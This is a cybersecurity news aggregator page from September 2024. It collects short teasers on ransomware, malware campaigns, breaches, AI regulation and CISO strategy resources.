Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S. The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832). "Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,

 Feed

Until just a couple of years ago, only a handful of IAM pros knew what service accounts are. In the last years, these silent Non-Human-Identities (NHI) accounts have become one of the most targeted and compromised attack surfaces. Assessments report that compromised service accounts play a key role in lateral movement in over 70% of ransomware attacks. However, there’s an alarming disproportion

 Feed

Threat actors have been observed targeting the construction sector by infiltrating the FOUNDATION Accounting Software, according to new findings from Huntress. "Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product’s default credentials," the cybersecurity company said. Targets of the emerging threat include plumbing, HVAC (heating,

 Feed

A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor. "Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the

 Feed

The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system. "The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le

 Data loss

Transport for London (TfL) suffers a cybersecurity incident and tells its 30,000 staff they will all have to their identities verified... in-person. Who might have been behind the attack and why? Meanwhile, Donald Trump's curious relationship with cryptocurrency is explored. All this and Demi Moore is discussed in   show more ...

the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

 Beware

Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Next-Generation Technologies & Secure Development Crashing Markets, Slower Innovation, But More Sustainable AI Development Rashmi Ramesh (rashmiramesh_) • September 18, 2024     Image: Shutterstock If the   show more ...

bubble isn’t popping already, it’ll pop soon, say many investors and close observers of the artificial intelligence […] La entrada Beware the Great AI Bubble Popping – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Governance & Risk Management , Network Detection & Response , SASE Acquisition Set to Boost SASE Protection, Network Connectivity for Swiss Businesses Michael Novinson (MichaelNovinson) • September 18, 2024     Swiss Post plans to purchase secure access   show more ...

service edge stalwart Open Systems to enhance secure communications and data protection […] La entrada Swiss Post to Strengthen Cybersecurity With Open Systems Buy – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 California

Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Next-Generation Technologies & Secure Development , Standards, Regulations & Compliance Laws Seek Removal of Deceptive Content, Labeling of Less Malicious Content Rashmi Ramesh (rashmiramesh_) • September   show more ...

18, 2024     The California statehouse dome in an undated file photo (Image: Shutterstock) California enacted regulation […] La entrada California Enacts Laws to Combat Election, Media Deepfakes – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Australian

Source: www.databreachtoday.com – Author: 1 Cybercrime , Encryption & Key Management , Fraud Management & Cybercrime International Law Enforcement Dismantles End-to-End Encrypted Messaging Service Akshaya Asokan (asokan_akshaya) • September 18, 2024     Alleged Ghost administrator Jay Je Yoon Jung   show more ...

being led away by an Australian Federal Police officer (Image: Australian Federal Police) An international […] La entrada Australian Police Arrest Alleged Head of Ghost Encrypted App – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 attacks

Source: www.databreachtoday.com – Author: 1 3rd Party Risk Management , Governance & Risk Management , Healthcare Regulatory Attorney Rachel Rose on Top Concerns for Healthcare Security Andrew Koh • September 18, 2024     20 Minutes    Rachel Rose, regulatory attorney Recent mega data breaches   show more ...

involving third-party vendors – such as the Change Healthcare cyberattack […] La entrada How Mega Attacks Are Spotlighting Critical 3rd-Party Risks – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Leadership & Executive Communication , Recruitment & Reskilling Strategy , Training & Security Leadership Tell Interviewers How You Respond to Incidents and Solve Problems Brandy Harris • September 18, 2024     Image: Getty Images Job interviews can   show more ...

be particularly challenging for roles in technical professions such as cybersecurity. Many […] La entrada Use the STAR Method for Your Cybersecurity Job Interview – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Information S

Aligning Cyber with Organisational Priorities Cybersecurity is critical, but business profitability is essential for survival. Understanding risk tolerance and operational insights is fundamental, as is engaging business leaders in discussions about goals and growth. Conducting a SWOT analysis can guide cyber   show more ...

strategy, while comprehending financial drivers and the impact of cyber incidents fosters stronger relationships […] La entrada Crack the Code se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada CISO Reporting Landscape 2024 se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

FIRST 100 DAYS We propose a series of recommendations from hard lessons learned and a best practice approach to: According to a study from the Enterprise Strategy Group and the Information Systems Security Association, a lack of alignment between the CISO role and the business, the C-suite and the Board of Directors   show more ...

can contribute to […] La entrada CISO PLAY BOOK se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Reporting Cyber Risk to Boards se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - Cybersecurity Tools - IAM - Ide

The Cybersecurity and Infrastructure Security Agency (CISA) has frequently identified virtual private network (VPN) solutions that have been involved in many recent high-profile incidents, both with cyber criminals and nation-state actors. CISA has discovered over 22 Known Exploited Vulnerabilities (KEVs) related to   show more ...

VPN compromise, leading to broad access to victim networks. These incidents and associated […] La entrada MODERN APPROACHES TO NETWORK ACCESS SECURITY se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - Cybersecurity Architecture - IA

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada CIOB Artificial Intelligence (AI) Playbook 2024 se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Information S

En el escenario actual, los avances tecnológicos, la interconectividad y la comunicación digital constituyen factores sesenciales para la sociedad, a tal magnitud que incluso la dinamizan significativamente, por lo que. en un contexto en donde la tecnología y la comunicación digital dominan, la innovación se   show more ...

presenta como un pilar fundamental, en el sentido que representa […] La entrada ESTADO DE LA CIBERSEGURIDAD EN COSTA RICA 2023 se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Risk & Compli

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Nuevas normativas de 2024 de ciberseguridad para vehículos se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

Una guía para las organizaciones de la sociedad civil que deseen iniciar un plan de ciberseguridad Este Manual se ha redactado con un objetivo sencillo: ayudar a su organización de la sociedad civil a desarrollar un plan de ciberseguridad comprensible y aplicable. A medida que el mundo se mueve cada vez más en   show more ...

línea, la […] La entrada Manual de Ciberseguridad se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2024-09
Aggregator history
Thursday, September 19
SUN
MON
TUE
WED
THU
FRI
SAT
SeptemberOctoberNovember